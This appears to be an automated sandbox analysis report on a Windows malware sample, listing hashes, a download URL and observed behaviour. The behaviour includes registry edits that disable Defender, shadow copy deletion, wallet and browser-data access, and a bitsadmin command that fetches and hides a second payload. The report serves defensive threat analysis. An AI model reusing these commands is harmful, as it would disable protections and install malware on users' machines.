Analysis
-
max time kernel
138s -
max time network
141s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
28-10-2021 16:34
Static task
static1
Behavioral task
behavioral1
Sample
hgty.bin.exe
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
hgty.bin.exe
Resource
win10-en-20210920
General
-
Target
hgty.bin.exe
-
Size
1.6MB
-
MD5
97b1b0eb2864514c1bd17dc2479fd392
-
SHA1
1e0db2c33bac2abf8cf5883f779b0fb34e63d7c7
-
SHA256
7bd1800901f644312525102786765942f63e164618b076d1e9c7d77e8c055e19
-
SHA512
c1940f8b49298f37e2fe23f2ac1fdb35144f09f77d4d58da96f748c78bac2f56f0b90dc19faf02c1a8d3d9992a1b34bb2d2c7c7ec71eab304151c3c843edbc59
Malware Config
Extracted
http://xuiklxus.xyz/hfile.bin
Signatures
-
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" reg.exe -
Modifies security service 2 TTPs 4 IoCs
Processes:
reg.exereg.exereg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" reg.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 18 364 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
Processes:
hgty.bin.tmp7za.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exeeDbwCBj.exeNemica.exe.compid process 3628 hgty.bin.tmp 1760 7za.exe 3852 kernel32.exe 1452 kernel32.exe 1288 kernel32.exe 2496 kernel32.exe 1300 kernel32.exe 1584 kernel32.exe 328 kernel32.exe 192 kernel32.exe 2308 kernel32.exe 2244 kernel32.exe 4012 kernel32.exe 3632 kernel32.exe 2744 kernel32.exe 1516 kernel32.exe 3580 kernel32.exe 1732 kernel32.exe 1020 kernel32.exe 2224 kernel32.exe 660 kernel32.exe 1876 kernel32.exe 3584 kernel32.exe 876 kernel32.exe 1456 kernel32.exe 360 kernel32.exe 1616 kernel32.exe 1980 kernel32.exe 2296 kernel32.exe 2376 kernel32.exe 2636 kernel32.exe 2320 kernel32.exe 1604 2208 kernel32.exe 916 kernel32.exe 688 kernel32.exe 2744 kernel32.exe 1608 kernel32.exe 1516 kernel32.exe 3924 kernel32.exe 3940 kernel32.exe 1416 kernel32.exe 2176 kernel32.exe 3592 kernel32.exe 3604 kernel32.exe 1264 kernel32.exe 2080 kernel32.exe 2020 kernel32.exe 4080 kernel32.exe 3284 kernel32.exe 2812 7za.exe 3768 7za.exe 2928 7za.exe 1252 7za.exe 3424 7za.exe 3772 7za.exe 3756 7za.exe 1400 7za.exe 4012 7za.exe 1884 7za.exe 200 7za.exe 1676 7za.exe 408 eDbwCBj.exe 3792 Nemica.exe.com -
Loads dropped DLL 1 IoCs
Processes:
hgty.bin.tmppid process 3628 hgty.bin.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
eDbwCBj.exedescription ioc process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce eDbwCBj.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" eDbwCBj.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
Nemica.exe.comdescription pid process target process PID 2868 set thread context of 2564 2868 Nemica.exe.com RegAsm.exe -
Drops file in Program Files directory 1 IoCs
Processes:
hgty.bin.tmpdescription ioc process File created C:\Program Files (x86)\is-12QT7.tmp hgty.bin.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 1036 timeout.exe 3252 timeout.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 3100 vssadmin.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
kernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" kernel32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" kernel32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" kernel32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" kernel32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" kernel32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" kernel32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ kernel32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" kernel32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ kernel32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" kernel32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" kernel32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" kernel32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" kernel32.exe -
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings cmd.exe -
Runs ping.exe 1 TTPs 64 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid process 3792 PING.EXE 3228 PING.EXE 1184 PING.EXE 1500 PING.EXE 3924 PING.EXE 2404 PING.EXE 3192 PING.EXE 1304 PING.EXE 2060 PING.EXE 3500 PING.EXE 1616 PING.EXE 1092 PING.EXE 1452 PING.EXE 188 PING.EXE 3584 PING.EXE 2224 PING.EXE 200 PING.EXE 824 PING.EXE 3492 PING.EXE 4040 PING.EXE 184 PING.EXE 1604 PING.EXE 1452 PING.EXE 1220 PING.EXE 3116 PING.EXE 3080 PING.EXE 3092 PING.EXE 1220 PING.EXE 4076 PING.EXE 1304 PING.EXE 3940 PING.EXE 2380 PING.EXE 1032 PING.EXE 1992 PING.EXE 2420 PING.EXE 1512 PING.EXE 1348 PING.EXE 324 PING.EXE 2744 PING.EXE 4076 PING.EXE 2084 PING.EXE 3424 PING.EXE 3500 PING.EXE 2564 PING.EXE 2032 PING.EXE 2648 PING.EXE 3772 PING.EXE 824 PING.EXE 1040 PING.EXE 188 PING.EXE 1040 PING.EXE 3020 PING.EXE 3416 PING.EXE 3484 PING.EXE 1720 PING.EXE 1264 PING.EXE 628 PING.EXE 2564 PING.EXE 1084 PING.EXE 2376 PING.EXE 364 PING.EXE 1608 PING.EXE 628 PING.EXE 2336 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
hgty.bin.tmppowershell.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exereg.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exepid process 3628 hgty.bin.tmp 3628 hgty.bin.tmp 364 powershell.exe 364 powershell.exe 364 powershell.exe 3852 kernel32.exe 3852 kernel32.exe 3852 kernel32.exe 3852 kernel32.exe 1452 kernel32.exe 1452 kernel32.exe 1288 kernel32.exe 1288 kernel32.exe 1452 kernel32.exe 1452 kernel32.exe 1288 kernel32.exe 1288 kernel32.exe 1300 kernel32.exe 1300 kernel32.exe 1300 kernel32.exe 1300 kernel32.exe 1584 kernel32.exe 1584 kernel32.exe 1584 kernel32.exe 1584 kernel32.exe 192 kernel32.exe 192 kernel32.exe 192 kernel32.exe 192 kernel32.exe 2308 kernel32.exe 2308 kernel32.exe 2308 kernel32.exe 2308 kernel32.exe 4012 kernel32.exe 4012 kernel32.exe 4012 kernel32.exe 4012 kernel32.exe 3632 reg.exe 3632 reg.exe 3632 reg.exe 3632 reg.exe 1516 kernel32.exe 1516 kernel32.exe 1516 kernel32.exe 1516 kernel32.exe 3580 kernel32.exe 3580 kernel32.exe 3580 kernel32.exe 3580 kernel32.exe 1020 kernel32.exe 1020 kernel32.exe 1020 kernel32.exe 1020 kernel32.exe 2224 kernel32.exe 2224 kernel32.exe 2224 kernel32.exe 2224 kernel32.exe 1876 kernel32.exe 1876 kernel32.exe 1876 kernel32.exe 1876 kernel32.exe 3584 kernel32.exe 3584 kernel32.exe 3584 kernel32.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 636 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exereg.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exedescription pid process Token: SeDebugPrivilege 364 powershell.exe Token: SeDebugPrivilege 3852 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 3852 kernel32.exe Token: SeIncreaseQuotaPrivilege 3852 kernel32.exe Token: 0 3852 kernel32.exe Token: SeDebugPrivilege 1452 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 1452 kernel32.exe Token: SeIncreaseQuotaPrivilege 1452 kernel32.exe Token: SeDebugPrivilege 1288 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 1288 kernel32.exe Token: SeIncreaseQuotaPrivilege 1288 kernel32.exe Token: 0 1288 kernel32.exe Token: SeDebugPrivilege 1300 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 1300 kernel32.exe Token: SeIncreaseQuotaPrivilege 1300 kernel32.exe Token: SeDebugPrivilege 1584 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 1584 kernel32.exe Token: SeIncreaseQuotaPrivilege 1584 kernel32.exe Token: 0 1584 kernel32.exe Token: SeDebugPrivilege 192 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 192 kernel32.exe Token: SeIncreaseQuotaPrivilege 192 kernel32.exe Token: SeDebugPrivilege 2308 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 2308 kernel32.exe Token: SeIncreaseQuotaPrivilege 2308 kernel32.exe Token: 0 2308 kernel32.exe Token: SeDebugPrivilege 4012 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 4012 kernel32.exe Token: SeIncreaseQuotaPrivilege 4012 kernel32.exe Token: SeDebugPrivilege 3632 reg.exe Token: SeAssignPrimaryTokenPrivilege 3632 reg.exe Token: SeIncreaseQuotaPrivilege 3632 reg.exe Token: 0 3632 reg.exe Token: SeDebugPrivilege 1516 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 1516 kernel32.exe Token: SeIncreaseQuotaPrivilege 1516 kernel32.exe Token: SeDebugPrivilege 3580 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 3580 kernel32.exe Token: SeIncreaseQuotaPrivilege 3580 kernel32.exe Token: 0 3580 kernel32.exe Token: SeDebugPrivilege 1020 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 1020 kernel32.exe Token: SeIncreaseQuotaPrivilege 1020 kernel32.exe Token: SeDebugPrivilege 2224 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 2224 kernel32.exe Token: SeIncreaseQuotaPrivilege 2224 kernel32.exe Token: 0 2224 kernel32.exe Token: SeDebugPrivilege 1876 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 1876 kernel32.exe Token: SeIncreaseQuotaPrivilege 1876 kernel32.exe Token: SeDebugPrivilege 3584 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 3584 kernel32.exe Token: SeIncreaseQuotaPrivilege 3584 kernel32.exe Token: 0 3584 kernel32.exe Token: SeDebugPrivilege 1456 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 1456 kernel32.exe Token: SeIncreaseQuotaPrivilege 1456 kernel32.exe Token: SeDebugPrivilege 360 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 360 kernel32.exe Token: SeIncreaseQuotaPrivilege 360 kernel32.exe Token: 0 360 kernel32.exe Token: SeDebugPrivilege 1980 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 1980 kernel32.exe Token: SeIncreaseQuotaPrivilege 1980 kernel32.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
Processes:
hgty.bin.tmpNemica.exe.comNemica.exe.compid process 3628 hgty.bin.tmp 3792 Nemica.exe.com 3792 Nemica.exe.com 3792 Nemica.exe.com 2868 Nemica.exe.com 2868 Nemica.exe.com 2868 Nemica.exe.com -
Suspicious use of SendNotifyMessage 6 IoCs
Processes:
Nemica.exe.comNemica.exe.compid process 3792 Nemica.exe.com 3792 Nemica.exe.com 3792 Nemica.exe.com 2868 Nemica.exe.com 2868 Nemica.exe.com 2868 Nemica.exe.com -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
hgty.bin.exehgty.bin.tmpcmd.execmd.exewlanext32.exedescription pid process target process PID 2784 wrote to memory of 3628 2784 hgty.bin.exe hgty.bin.tmp PID 2784 wrote to memory of 3628 2784 hgty.bin.exe hgty.bin.tmp PID 2784 wrote to memory of 3628 2784 hgty.bin.exe hgty.bin.tmp PID 3628 wrote to memory of 592 3628 hgty.bin.tmp cmd.exe PID 3628 wrote to memory of 592 3628 hgty.bin.tmp cmd.exe PID 3628 wrote to memory of 592 3628 hgty.bin.tmp cmd.exe PID 3628 wrote to memory of 820 3628 hgty.bin.tmp cmd.exe PID 3628 wrote to memory of 820 3628 hgty.bin.tmp cmd.exe PID 3628 wrote to memory of 820 3628 hgty.bin.tmp cmd.exe PID 592 wrote to memory of 3420 592 cmd.exe bitsadmin.exe PID 592 wrote to memory of 3420 592 cmd.exe bitsadmin.exe PID 592 wrote to memory of 3420 592 cmd.exe bitsadmin.exe PID 820 wrote to memory of 364 820 cmd.exe powershell.exe PID 820 wrote to memory of 364 820 cmd.exe powershell.exe PID 820 wrote to memory of 364 820 cmd.exe powershell.exe PID 592 wrote to memory of 1684 592 cmd.exe wlanext32.exe PID 592 wrote to memory of 1684 592 cmd.exe wlanext32.exe PID 592 wrote to memory of 1872 592 cmd.exe attrib.exe PID 592 wrote to memory of 1872 592 cmd.exe attrib.exe PID 592 wrote to memory of 1872 592 cmd.exe attrib.exe PID 1684 wrote to memory of 2880 1684 wlanext32.exe cmd.exe PID 1684 wrote to memory of 2880 1684 wlanext32.exe cmd.exe PID 592 wrote to memory of 188 592 cmd.exe PING.EXE PID 592 wrote to memory of 188 592 cmd.exe PING.EXE PID 592 wrote to memory of 188 592 cmd.exe PING.EXE PID 592 wrote to memory of 3500 592 cmd.exe PING.EXE PID 592 wrote to memory of 3500 592 cmd.exe PING.EXE PID 592 wrote to memory of 3500 592 cmd.exe PING.EXE PID 592 wrote to memory of 1148 592 cmd.exe PING.EXE PID 592 wrote to memory of 1148 592 cmd.exe PING.EXE PID 592 wrote to memory of 1148 592 cmd.exe PING.EXE PID 592 wrote to memory of 1452 592 cmd.exe PING.EXE PID 592 wrote to memory of 1452 592 cmd.exe PING.EXE PID 592 wrote to memory of 1452 592 cmd.exe PING.EXE PID 592 wrote to memory of 3676 592 cmd.exe PING.EXE PID 592 wrote to memory of 3676 592 cmd.exe PING.EXE PID 592 wrote to memory of 3676 592 cmd.exe PING.EXE PID 592 wrote to memory of 3940 592 cmd.exe PING.EXE PID 592 wrote to memory of 3940 592 cmd.exe PING.EXE PID 592 wrote to memory of 3940 592 cmd.exe PING.EXE PID 592 wrote to memory of 412 592 cmd.exe PING.EXE PID 592 wrote to memory of 412 592 cmd.exe PING.EXE PID 592 wrote to memory of 412 592 cmd.exe PING.EXE PID 592 wrote to memory of 1040 592 cmd.exe PING.EXE PID 592 wrote to memory of 1040 592 cmd.exe PING.EXE PID 592 wrote to memory of 1040 592 cmd.exe PING.EXE PID 592 wrote to memory of 2564 592 cmd.exe PING.EXE PID 592 wrote to memory of 2564 592 cmd.exe PING.EXE PID 592 wrote to memory of 2564 592 cmd.exe PING.EXE PID 592 wrote to memory of 1296 592 cmd.exe PING.EXE PID 592 wrote to memory of 1296 592 cmd.exe PING.EXE PID 592 wrote to memory of 1296 592 cmd.exe PING.EXE PID 592 wrote to memory of 1468 592 cmd.exe PING.EXE PID 592 wrote to memory of 1468 592 cmd.exe PING.EXE PID 592 wrote to memory of 1468 592 cmd.exe PING.EXE PID 592 wrote to memory of 1616 592 cmd.exe PING.EXE PID 592 wrote to memory of 1616 592 cmd.exe PING.EXE PID 592 wrote to memory of 1616 592 cmd.exe PING.EXE PID 592 wrote to memory of 1720 592 cmd.exe PING.EXE PID 592 wrote to memory of 1720 592 cmd.exe PING.EXE PID 592 wrote to memory of 1720 592 cmd.exe PING.EXE PID 592 wrote to memory of 2032 592 cmd.exe PING.EXE PID 592 wrote to memory of 2032 592 cmd.exe PING.EXE PID 592 wrote to memory of 2032 592 cmd.exe PING.EXE -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\hgty.bin.exe"C:\Users\Admin\AppData\Local\Temp\hgty.bin.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-EBC1H.tmp\hgty.bin.tmp"C:\Users\Admin\AppData\Local\Temp\is-EBC1H.tmp\hgty.bin.tmp" /SL5="$50062,1023751,780800,C:\Users\Admin\AppData\Local\Temp\hgty.bin.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\ControlSet000.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer Explorers /download /priority FOREGROUND http://xuiklxus.xyz/wlanext32.exe C:\Users\Admin\AppData\Local\Temp\wlanext32.exe4⤵
- Download via BitsAdmin
-
C:\Users\Admin\AppData\Local\Temp\wlanext32.exewlanext32.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c pause5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +h wlanext32.exe4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\PING.EXEPing -n 3 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
-
C:\Windows\SysWOW64\PING.EXEPing -n 1 127.0.0.14⤵
- Runs ping.exe
-
